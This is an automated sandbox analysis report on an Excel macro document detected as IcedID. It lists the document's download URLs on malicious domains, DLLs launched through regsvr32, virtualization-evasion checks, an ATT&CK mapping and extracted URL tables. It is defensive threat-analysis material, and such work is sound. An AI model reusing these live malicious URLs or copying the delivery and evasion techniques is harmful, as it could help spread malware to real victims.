          Source: regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpBinary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-h3 lb-title"> VMware Cloud on AWS</h3>
          Source: regsvr32.exe, 00000004.00000003.2092928788.000000000279D000.00000004.00000001.sdmpBinary or memory string: <a style="padding-left:30px; padding-bottom:0px; padding-right:30px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
          Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02002434 rdtsc 4_2_02002434

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\System32\regsvr32.exeDomain query: astrocycle.download
          Source: C:\Windows\System32\regsvr32.exeDomain query: aws.amazon.com
          Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 13.224.92.73 187Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 172.67.213.115 80Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_020022DC LookupAccountNameW,4_2_020022DC

          Stealing of Sensitive Information:

          barindex
          Yara detected IcedIDShow sources
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2904, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected IcedIDShow sources
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2904, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsScripting1Path InterceptionProcess Injection11Masquerading121OS Credential DumpingSecurity Software Discovery211Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution43Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerAccount Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSSystem Owner/User Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol124SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery22Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 444771 Sample: HRScheduleH3965005.xlsm Startdate: 06/07/2021 Architecture: WINDOWS Score: 100 35 Found malware configuration 2->35 37 Document exploit detected (drops PE files) 2->37 39 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->39 41 6 other signatures 2->41 6 EXCEL.EXE 53 26 2->6         started        process3 dnsIp4 23 uppercilio.fun 172.67.146.88, 49169, 80 CLOUDFLARENETUS United States 6->23 25 voopeople.fun 172.67.194.117, 49168, 80 CLOUDFLARENETUS United States 6->25 27 thousandsyears.download 172.67.198.51, 49167, 80 CLOUDFLARENETUS United States 6->27 19 C:\Users\user\XTOWN.dll, PE32+ 6->19 dropped 21 C:\Users\user\AppData\Local\...\lsdfik[1].fml, PE32+ 6->21 dropped 43 Document exploit detected (creates forbidden files) 6->43 45 Document exploit detected (UrlDownloadToFile) 6->45 11 regsvr32.exe 6->11         started        14 regsvr32.exe 4 6->14         started        17 regsvr32.exe 6->17         started        file5 signatures6 process7 dnsIp8 47 System process connects to network (likely due to code injection or exploit) 11->47 49 Contains functionality to detect hardware virtualization (CPUID execution measurement) 11->49 51 Tries to detect virtualization through RDTSC time measurements 11->51 29 astrocycle.download 172.67.213.115, 49171, 80 CLOUDFLARENETUS United States 14->29 31 dr49lng3n1n2s.cloudfront.net 13.224.92.73, 443, 49170 AMAZON-02US United States 14->31 33 2 other IPs or domains 14->33 signatures9

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          astrocycle.download1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
          http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
          http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
          http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
          http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
          https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
          https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
          https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
          https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
          http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
          http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
          http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
          http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
          https://www.buzzsprout.com;0%Avira URL Cloudsafe
          http://voopeople.fun/div/44376,8555986111.jpg1%VirustotalBrowse
          http://voopeople.fun/div/44376,8555986111.jpg0%Avira URL Cloudsafe
          http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
          http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
          http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
          http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
          http://astrocycle.download/1%VirustotalBrowse
          http://astrocycle.download/0%Avira URL Cloudsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe
          http://crl.sca1b.amazontrust.com/sca1b.crl0g0-0%Avira URL Cloudsafe
          http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
          http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
          http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
          http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
          http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
          http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
          http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
          http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
          http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
          http://uppercilio.fun/div/44376,8555986111.jpg0%Avira URL Cloudsafe
          http://crl.rootg2.amazo0%Avira URL Cloudsafe
          http://o.ss2.us/00%URL Reputationsafe
          http://o.ss2.us/00%URL Reputationsafe
          http://o.ss2.us/00%URL Reputationsafe
          https://prod-us-west-2.csp-report.marketing.aws.dev/submit0%Avira URL Cloudsafe
          http://thousandsyears.download/div/44376,8555986111.jpg0%Avira URL Cloudsafe
          http://ocsp.entrust.net030%URL Reputationsafe
          http://ocsp.entrust.net030%URL Reputationsafe
          http://ocsp.entrust.net030%URL Reputationsafe
          https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-101KGS0X8RKQZRM7QXQJNX-Content-Ty0%Avira URL Cloudsafe
          http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
          http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
          http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
          https://a0.awsstatic.com;0%Avira URL Cloudsafe
          http://crt.sca1b.a0%Avira URL Cloudsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          uppercilio.fun
          		172.67.146.88
          		truefalse
            		unknown
            thousandsyears.download
            		172.67.198.51
            		truefalse
              		unknown
              voopeople.fun
              		172.67.194.117
              		truefalse
                		unknown
                astrocycle.download
                		172.67.213.115
                		truetrueunknown
                dr49lng3n1n2s.cloudfront.net
                		13.224.92.73
                		truefalse
                  		high
                  aws.amazon.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://voopeople.fun/div/44376,8555986111.jpgfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://astrocycle.download/true
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://uppercilio.fun/div/44376,8555986111.jpgfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://thousandsyears.download/div/44376,8555986111.jpgfalse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://twitter.com/awscloudregsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                      		high
                      https://a0.awsstatic.com/libra/1.0.385/directoriesregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                        		high
                        https://aws.amazon.com/terms/?nc1=f_prregsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                          		high
                          https://media.amazonwebservices.comregsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                            		high
                            https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gifregsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                              		high
                              https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.htmlregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                		high
                                https://aws.amazon.com/cn/regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                  		high
                                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://a0.awsstatic.com/libra-css/imagesregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                    		high
                                    https://a0.awsstatic.com/libra/1.0.385/librastandardlibregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                      		high
                                      https://a0.awsstatic.com/psf/nullregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                        		high
                                        https://dts.podtrac.comregsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                          		high
                                          https://aws.amazon.com/ar/regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                            		high
                                            https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-homregsvr32.exe, 00000004.00000003.2092889123.00000000027C3000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllwregsvr32.exe, 00000004.00000002.2098244987.000000000279D000.00000004.00000001.sdmpfalse
                                              		high
                                              https://pages.awscloud.com/communication-preferences?trk=homepageregsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                		high
                                                http://ocsp.rootg2.amazontrust.com08regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                https://aws.amazon.com/cn/?nc1=h_lsregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=defaultregsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://aws.amazon.com/ru/regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://www.buzzsprout.com;regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      https://aws.amazon.com/tw/?nc1=h_lsregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowserregsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://i18n-string.us-west-2.prod.pricing.aws.a2z.comregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://aws.amazon.com/ko/regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://aws.amazon.com/ru/?nc1=h_lsregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://a0.awsstatic.com/libra-css/images/site/fav/favicon.icoregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://aws.amazon.com/es/regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://crl.sca1b.amazontrust.com/sca1b.crl0regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://docs.aws.amazon.com/index.html?nc2=h_ql_docregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://aws.amazon.com/ar/?nc1=h_lsregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2089228423.0000000001D50000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2096589121.0000000001D00000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2097089458.0000000001C70000.00000002.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		low
                                                                        https://aws.amazon.com/th/regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.windows.com/pctv.regsvr32.exe, 00000004.00000002.2099979951.0000000003090000.00000002.00000001.sdmpfalse
                                                                            		high
                                                                            https://a0.awsstatic.com/pricing-calculator/js/1.0.2regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://crl.sca1b.amazontrust.com/sca1b.crl0g0-regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://a0.awsstatic.com/plc/js/1.0.112/plcregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://aws.amazon.com/marketplace/?nc2=h_moregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://ocsp.sca1b.amazontrust.com06regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://amazon.com/regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                                                                    		high
                                                                                    https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.pngregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://console.aws.amazon.com/support/home/?nc2=h_ql_curegsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://aws.amazon.com/search/regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credentialregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://aws.amazon.com/?nc2=h_lgregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://ocsp.rootca1.amazontrust.com0:regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://console.aws.amazon.com/support/home/?nc1=f_drregsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://aws.amazon.com/fr/regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://windowsmedia.com/redir/services.asp?WMPFriendly=trueregsvr32.exe, 00000004.00000002.2100434449.0000000003277000.00000002.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobileregsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://aws.amazon.com/vi/regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://mktg-apac.s3-ap-southeast-1.amazonaws.comregsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.twitch.tv/awsregsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://aws.amazon.com/marketplace/?nc2=h_ql_mpregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://aws.amazon.com/searchregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://a0.awsstatic.com/libra/1.0.385/libra-head.jsregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://crl.rootg2.amazontrust.com/rootg2.crl0regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000004.00000002.2098394364.0000000002CA0000.00000002.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://a0.awsstatic.com/da/js/1.0.47/aws-da.jsregsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://aws.amazon.com/tw/regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://aws.amazon.com/tr/?nc1=h_lsregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://console.aws.amazon.com/?nc2=h_m_mcregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://aws.amazon.com/fr/?nc1=h_lsregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://crl.rootg2.amazoregsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://o.ss2.us/0regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://aws.amazon.com/search/?searchQuery=regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://a0.awsstatic.com/libra-search/1.0.13/jsregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://aws.amazon.com/privacy/?nc1=f_prregsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://aws.amazon.com/pt/?nc1=h_lsregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://prod-us-west-2.csp-report.marketing.aws.dev/submitregsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://aws.amazon.com/jp/?nc1=h_lsregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://aws.amazon.com/regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://www.msnbc.com/news/ticker.txtregsvr32.exe, 00000004.00000002.2099979951.0000000003090000.00000002.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.pngregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.jsregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://aws.amazon.com/podcasts/aws-podcast/regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://ocsp.entrust.net03regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-101KGS0X8RKQZRM7QXQJNX-Content-Tyregsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://aws.amazon.com/jp/regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://crt.rootg2.amazontrust.com/rootg2.cer0=regsvr32.exe, 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://aws.amazon.com/pt/regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://aws.amazon.com/?nc1=h_lsregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.htmlregsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://a0.awsstatic.com/libra-css/css/1.0.382regsvr32.exe, 00000004.00000003.2092916570.0000000002790000.00000004.00000001.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://a0.awsstatic.com;regsvr32.exe, 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		low
